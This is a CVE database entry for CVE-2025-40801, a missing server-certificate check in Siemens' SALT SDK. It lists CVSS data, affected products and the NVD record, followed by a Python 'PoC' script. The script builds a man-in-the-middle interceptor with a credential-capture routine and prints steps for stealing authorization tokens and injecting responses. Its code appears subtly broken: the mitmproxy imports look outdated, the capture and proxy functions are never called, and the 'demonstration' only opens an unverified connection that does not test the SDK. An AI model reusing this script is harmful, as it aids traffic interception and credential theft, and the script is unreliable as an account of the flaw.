CVE-2025-40801

Description

A vulnerability has been identified in COMOS V10.6 (All versions < V10.6.1), COMOS V10.6 (All versions < V10.6.1), JT Bi-Directional Translator for STEP (All versions), NX V2412 (All versions < V2412.8900 with Cloud Entitlement (bundled as NX X)), NX V2506 (All versions < V2506.6000 with Cloud Entitlement (bundled as NX X)), Simcenter 3D (All versions < V2506.6000 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Femap (All versions < V2506.0002 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Studio (All versions < V2506.0001), Simcenter System Architect (All versions < V2506.0001), Tecnomatix Plant Simulation (All versions < V2504.0007). The SALT SDK is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

COMOS V10.6 (所有 < V10.6.1 的版本)

JT Bi-Directional Translator for STEP (所有版本)

NX V2412 (所有 < V2412.8900 with Cloud Entitlement 的版本)

NX V2506 (所有 < V2506.6000 with Cloud Entitlement 的版本)

Simcenter 3D (所有 < V2506.6000 with Cloud Entitlement 的版本)

Simcenter Femap (所有 < V2506.0002 with Cloud Entitlement 的版本)

Simcenter Studio (所有 < V2506.0001)

Simcenter System Architect (所有 < V2506.0001)

Tecnomatix Plant Simulation (所有 < V2504.0007 的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-40801 PoC - TLS Certificate Validation Bypass
# This PoC demonstrates the MITM attack vector against SALT SDK
# Note: This is for educational and authorized testing purposes only

import ssl
import socket
import subprocess
from mitmproxy import proxy, options
from mitmproxy.proxy.server import ProxyServer

class TLSInterceptor:
    """
    TLS/SSL Certificate Validation Bypass PoC
    Simulates attacker performing MITM attack due to missing certificate validation
    """
    
    def __init__(self, listen_port=8443, target_host='auth.siemens.com', target_port=443):
        self.listen_port = listen_port
        self.target_host = target_host
        self.target_port = target_port
        self.captured_data = []
    
    def create_fake_tls_context(self):
        """
        Create a malicious TLS context without proper certificate validation
        This simulates the vulnerable SDK behavior
        """
        # Create unverified SSL context (vulnerable behavior)
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE  # Critical: No certificate validation
        return ctx
    
    def start_proxy(self):
        """
        Start MITM proxy to intercept TLS connections
        """
        opts = options.Options(listen_host='0.0.0.0', listen_port=self.listen_port)
        
        # Configure proxy to intercept all HTTPS traffic
        opts.ssl_insecure = True  # Accept invalid certificates
        
        config = proxy.ProxyConfig(opts)
        server = ProxyServer(config)
        
        print(f"[*] MITM Proxy started on port {self.listen_port}")
        print(f"[*] Redirecting traffic to {self.target_host}:{self.target_port}")
        return server
    
    def capture_credentials(self, client_socket, server_socket):
        """
        Capture and log sensitive data from intercepted connection
        """
        try:
            while True:
                # Receive data from client
                client_data = client_socket.recv(4096)
                if not client_data:
                    break
                    
                # Log captured data (in real attack, this would be exfiltrated)
                self.captured_data.append(client_data)
                print(f"[+] Captured {len(client_data)} bytes from client")
                
                # Forward to server
                server_socket.sendall(client_data)
                
                # Receive response from server
                server_response = server_socket.recv(4096)
                if server_response:
                    # Log server response
                    self.captured_data.append(server_response)
                    client_socket.sendall(server_response)
                    
        except Exception as e:
            print(f"[-] Error during interception: {e}")
        finally:
            client_socket.close()
            server_socket.close()
    
    def demonstrate_vulnerability(self):
        """
        Demonstrate the certificate validation bypass
        """
        print("=" * 60)
        print("CVE-2025-40801 - SALT SDK Certificate Validation Bypass")
        print("=" * 60)
        
        # Simulate vulnerable connection (no certificate validation)
        print("\n[*] Establishing connection WITHOUT certificate validation...")
        ctx = self.create_fake_tls_context()
        
        try:
            with socket.create_connection((self.target_host, self.target_port), timeout=10) as sock:
                with ctx.wrap_socket(sock, server_hostname=self.target_host) as ssock:
                    cert = ssock.getpeercert()
                    print(f"[!] WARNING: Connection established despite invalid/missing certificate")
                    print(f"[!] Certificate info: {cert}")
                    print("[*] This demonstrates the vulnerability - no proper validation occurred")
                    return True
        except Exception as e:
            print(f"[-] Connection failed: {e}")
            return False

def main():
    poc = TLSInterceptor()
    poc.demonstrate_vulnerability()
    
    print("\n[*] To fully exploit this vulnerability:")
    print("    1. Position attacker in network path (MITM)")
    print("    2. Deploy malicious TLS server with self-signed cert")
    print("    3. Redirect SALT SDK traffic to attacker-controlled server")
    print("    4. Capture authorization tokens and credentials")
    print("    5. Potentially inject malicious responses")

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40801
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40801
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40801/
[4] VulDB https://vuldb.com/cve/CVE-2025-40801
[5] https://cert-portal.siemens.com/productcert/html/ssa-212953.html
[6] https://cert-portal.siemens.com/productcert/html/ssa-710408.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40801", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:45.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in COMOS V10.6 (All versions < V10.6.1), COMOS V10.6 (All versions < V10.6.1), JT Bi-Directional Translator for STEP (All versions), NX V2412 (All versions < V2412.8900 with Cloud Entitlement (bundled as NX X)), NX V2506 (All versions < V2506.6000 with Cloud Entitlement (bundled as NX X)), Simcenter 3D (All versions < V2506.6000 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Femap (All versions < V2506.0002 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Studio (All versions < V2506.0001), Simcenter System Architect (All versions < V2506.0001), Tecnomatix Plant Simulation (All versions < V2504.0007). The SALT SDK is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-212953.html", "source": "[email protected]"}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-710408.html", "source": "[email protected]"}]}}